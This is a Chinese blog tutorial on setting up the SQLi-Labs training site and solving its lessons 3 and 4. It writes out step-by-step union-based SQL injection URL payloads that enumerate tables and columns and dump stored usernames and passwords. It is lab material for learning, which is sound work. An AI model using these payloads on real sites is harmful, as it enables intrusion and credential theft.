web安全sql注入篇——sqls-labs的安装和注入

最新推荐文章于 2024-05-02 22:32:03 发布
最新推荐文章于 2024-05-02 22:32:03 发布
阅读量1.9k 收藏 3
点赞数 1
文章标签: sql web安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_68167825/article/details/125221171
版权

文章目录

前言

我们在刚学习 SQL 注入的时候,往往都需要一个能 SQL 注入的网站进行 SQL 注入学习。如果直接去网上寻找存在 SQL 注入的网站对新手来说有些难度,因此我们一般都是在本地搭建一个能 SQL 注入测试的网站。

这里就来讲解一下 SQLi-Labs 的下载,安装,搭建教程。

注意: mysql 版本一定要设置成 php5 以上,php5 以上才有 information_schema 库。

一、sqls-labs是什么?

SQLi-Labs 是一个专业的 SQL 注入练习平台,它适用于 GET 和 POST 等多场景的注入。

二、windows环境安装

使用 phpStudy 这个软件一键安装,方便快捷。
在这里插入图片描述创建好后重新启动一下小皮。

三、修改配置文件

修改 \sqli\sql-connections 目录下的 db-creds.inc 文件内容,将数据库默认的信息修改为自己数据库的信息

在这里插入图片描述主要是修改 dbpass 的内容,小皮的 Windows 版中默认为 root,所以这里直接添加root,如果使用其他环境则根据具体环境修改即可。

四、访问sqls-labs,并点击「Setup/reset Database for labs」来初始化创建数据库

在这里插入图片描述如果出现这个界面,就表名sqls-labs配置成功
在这里插入图片描述

五、注入第三关lees3

1.在URL框输入?id=1\能得到闭合符号为’)。
在这里插入图片描述

2.依次输入?id=1’) order by 7 – -
?id=1’) order by 4 – -
?id=1’) order by 3 – -
可以得到只有3列数据在这里插入图片描述
在这里插入图片描述
在这里插入图片描述3.输入?id=-1’) union select 1,2,3 – -
只显示了2,3,说明只有2和3可以当注入口。
在这里插入图片描述
4.输入?id=-1’) union select 1,database(),version() – -
爆出数据库版本为5.7.26,数据库名为security。在这里插入图片描述
5.输入?id=-1’) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘security’ – -
爆出了security库的四个表:emails、referers、uagents、users
在这里插入图片描述
6.根据第五步得到的信息,可以大致推测到敏感信息位于users表。接下来输入:?id=-1’) union select 1,2,group_concat(column_name) from information_schema.columns where columns.table_schema=‘security’ and columns.table_name=‘users’ – -
爆出user的三个列:id、username、password
在这里插入图片描述
7.根据第6部得到的信息,就可以知道了用户名和密码位于user表下的username和password列。
输入:?id=-1’) union select 1,group_concat(username),group_concat(password) from users – -
爆出了敏感数据
在这里插入图片描述

六、注入第四关less4

1.同理,输入:?id=1\ 使用转义符号\爆出闭合符号为")
在这里插入图片描述2.输入:?id=1") order by 3 – -
得出只有三列数据
在这里插入图片描述3.输入:?id=-1") union select 1,2,3 – -
只显示了2,3,说明只有2和3可以当注入口。
在这里插入图片描述4.输入?id=-1") union select 1,database(),version() – -
爆出数据库版本为5.7.26,数据库名为security。

在这里插入图片描述
5.输入?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘security’ – -
爆出了security库的四个表:emails、referers、uagents、users在这里插入图片描述
6…根据第五步得到的信息,可以大致推测到敏感信息位于users表。接下来输入:?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where columns.table_schema=‘security’ and columns.table_name=‘users’ – -
爆出user的三个列:id、username、password在这里插入图片描述
7.根据第6部得到的信息,就可以知道了用户名和密码位于user表下的username和password列。
输入:?id=-1") union select 1,group_concat(username),group_concat(password) from users – -
爆出了敏感数据在这里插入图片描述

鲨鱼辣椒yyy
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
PHP、Apache 环境中部署 sqli-labs(SQL 注入靶场) 知识点 1: sqli-labs 介绍 ...通过部署 sqli-labs,用户可以在 PHP 和 Apache 环境中实践 SQL 注入的技术,从而提高自己的安全意识和防御能力。
sqIi-labs,SQL注入平台
08-06
sqIi-labs:是一款学习SQL注入的开源平台,共有75种不同类型的注入 解压密码:ms08067.com sqIi-labs的使用文章见:https://blog.csdn.net/qq_41453285/article/details/100827739
sql-labs
m0_74606212的博客
03-10 381
sql-labs
sql-labs靶场环境搭建
ljlrookiebird的博客
03-29 2734
有可能mysql无法打开,应该是和你本地的mysql冲突了,找到命令提示符界面右键使用管理员打开后,输入命令:sc delete mysql,删除你本地的mysql,记住用管理员打开,否则可能没有权限导致无法删除,删除后即可在phpstudy面板正常启动mysql服务。最近突然想对网安知识进行复习,然后就想起之前做过的sql-labs靶场,这个靶场对于我们学习sql注入的知识还是比较有帮助的,接下来我就记录下我的闯关过程吧,本文章一共分为环境搭建和闯关两部分。初始化完成后就可以愉快的开始闯关了。
sql-labs通关详解(1-10)
最新发布
guowu666的博客
05-02 542
sqli-labs 1-10通关详解。
sqli-labs安装(linux,windows)
逆向萌新的博客
07-14 2991
sqli-labs安装(linux,windows)
sql-labs(1~4)
qq_53142368的博客
03-13 2686
学习目标: sql-labs 靶场基础练习 学习内容: sql-labs 靶场1~4关 学习时间: 2021年3月7日~2021年3月13日 学习产出: 前言 说出来满满都是泪呀 /(ㄒoㄒ)/~~ 我的靶场一直搭建不好,tmd,PHP study下载好了,并且在db-creds.inc里的用户地址也改为了本地127.0.0.1(localhost) 但是在打开靶场,发现打不开题(知道有多难受么)知道最近才问学长,同学,才发现是自己的PHP study版本太高了,这里就又出现一个问题,哎,我下载了好几个版本
SQL注入天书 sqli-labs
01-11
SQL注入天书 sqli-labs
sqlilabs过关手册注入天书,过关sqlliabs的绝佳手册
06-28
Sqli-labs安装需要安装以下环境 apache+mysql+php Sqli-labs安装 将之前下载的源码解压到web目录下,linux的apache为 /var/www/html下,windows下的wamp解压在www目录下。 修改sql-connections/db-creds.inc文件当中...
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例.doc
07-09
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例 本文档主要讲解了如何结合手工注入编写一个SQL盲注脚本,以SQLi-Labs less16为例。整个过程可以分为两部分:分析测试注入点和获取数据库名编写脚本。 ...
SQLSserver2008 中
12-29
? 第四章 T-SQL编程 ? ? 1、TSQL语句的分类 ? 2、TSQL语句实战1 ? 3、TSQL语句实战2 ? 4、TSQL语句实战3 ? 5、TSQL语句实战4 ? 6、TSQL语句实战5 ? 7、TSQL语句实战6 ? 8、TSQL语句实战7 ? 9、TSQL语句实战8 ? 10、TSQL语句实战9 ? 11、TSQL语句实战10 ? 12、TSQL语句实战11 ? 13、TSQL语句实战12 ? 14、TSQL语句实战13 ? 15、TSQL语句实战14 ? 16、TSQL语句实战15 ? 17、TSQL语句实战16 ? 18、TSQL语句实战17 ? 19、TSQL语句实战18 ? 20、TSQL语句实战19 ? 21、TSQL语句实战20 ? ? 第五章 函数 ? ? 1、函数简介 ? 2、函数(1) ? 3、函数(2) ? 4、函数(3) ? 5、函数(4) ? 6、函数(5) ? 7、函数(6) ? 8、函数(7) ? 9、函数(8) ? 10、函数(9) ? 11、函数(10) ? 12、函数(11) ? 13、函数(12) ? 14、函数(13) ? 15、函数(14) ? 16、函数(15) ? 17、函数(16) ? 18、函数(17) ? 19、函数(18) ? 20、函数(19) ? 21、函数(20) ? 22、函数(21) ? 23、函数(22) ? ? ? 第六章 存储过程 ? ? 1、存储过程(1) ? 2、存储过程(2) ? 3、存储过程(3) ? 4、存储过程(4) ? 5、存储过程(5) ? 6、存储过程(6) ? 7、存储过程(7) ? 8、存储过程(8) ? 9、存储过程(9) ? 10、存储过程(10) ? 11、存储过程(11) ? 12、存储过程(12) ? 13、存储过程(13) ? 14、存储过程(14) ? 15、存储过程(15) ? 16、存储过程(16) ? 17、存储过程(17) ? 18、存储过程(18) ? 19、存储过程(19) ? 20、存储过程(20) ? 21、存储过程(21) ? ? 第七章 游标 ? ? 1、游标1 ? 2、游标2 ? 3、游标3 ? 4、游标4 ? 5、游标5 ? 6、游标6 ? 7、游标7 ? 8、游标8 ? 9、游标9
sql-labs 闯关 5~10
qq_44663230的博客
08-14 1412
sql-labs 第5~10关 盲注系列
SQLi-Labs 安装
SunJ3t的菠萝屋
05-24 6502
1. 前言 我们在刚学习 SQL 注入的时候,往往都需要一个能 SQL 注入的网站进行 SQL 注入学习。如果直接去网上寻找存在 SQL 注入的网站对新手来说有些难度,因此我们一般都是在本地搭建一个能 SQL 注入测试的网站。 这里就来讲解一下 SQLi-Labs 的下载,安装,搭建教程。 注意: PHP 版本一定要设置成 PHP5 以上,PHP7 以下,PHP5 以上才有 information_schema 库,PHP7 之后的 mysql_ 都改成了 mysqli_** 了,所以用其他版本的 PHP
sqli-labs靶场安装
剁椒鱼头没剁椒的博客
10-22 6716
PhpStudy国内12年老牌公益软件,集安全,高效,功能与一体,已获得全球用户认可安装,运维也高效。支持一键LAMP,LNMP,集群,监控,网站,FTP,数据库,JAVA等100多项服务器管理功能。Sqlilabs是一个学习sql注入的平台,GET和POST场景包括了许多基本的实验内容,例如:基于错误的注入、盲注、更新查询注入、插入查询注入、Header注入、二次注入、Bypass WAF、堆叠注入等等。
SQL注入练习平台sqli-labs
热门推荐
海枫的专栏
11-04 1万+
你是否在学习SQL注入找不到好的OJ平台,这里介绍sqli-labs项目给你,非常适合SQL注入初学者来这里升级怪兽。
SQL注入sqli-labs靶场搭建流程及遇常见问题解决办法
scarberry的博客
08-02 2536
进入github官方网站,搜索sqli-labs 点击Audi-1/sqli-labs 点击code -> download ZIP 下载完成后本地会得到一个压缩包,将其解压至某个目录下(记为A目录) 打开phpstudy -> 创建网站 前往设置 域名可随心情设置 根目录即为A目录(刚刚解压后文件所在目录) PHP版本不一定要设置此版本 点击确认 点击管理 -> 打开网站 或直接在浏览器搜索域名,比如sql.test即可看到SQL注入的靶场 此时鼠标点击setup/reset
sqli-lab之第零章--环境搭建
江南小虫虫的博客
09-30 3073
第零章 环境搭建 前言 本系列教程的试验靶场为sqli-labs ,该靶场的下载地址为 https://github.com/Audi-1/sqli-labs ,可以自行去下载,而装了git的童鞋也可以直接用下面的命令clone到随意的目录 git clone https://github.com/Audi-1/sqli-labs 因为写这个靶场的印度程序猿当年的php的版本小于7,用的是类似于...
sql-labs详细全解
qq_38415434的博客
10-23 4223
** sql-labs详细全解 ** 第一关: 常见的string注入: http://192.168.80.139/sqli-labs-master/Less-1/?id=1 构造url: 1.http://192.168.80.139/sqli-labs-master/Less-1/?id=1’ 报错 2.http://192.168.80.139/sqli-labs-master/Les...
SQL注入靶场sqli-labs
12-20
sqli-labs是一个基于SQL注入的游戏教程,它可以帮助...请注意,搭建sqli-labs靶场需要一定的技术基础和安全意识。在进行任何实验之前,请确保您已经了解了SQL注入的风险,并采取适当的安全措施,以避免对系统造成损害。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值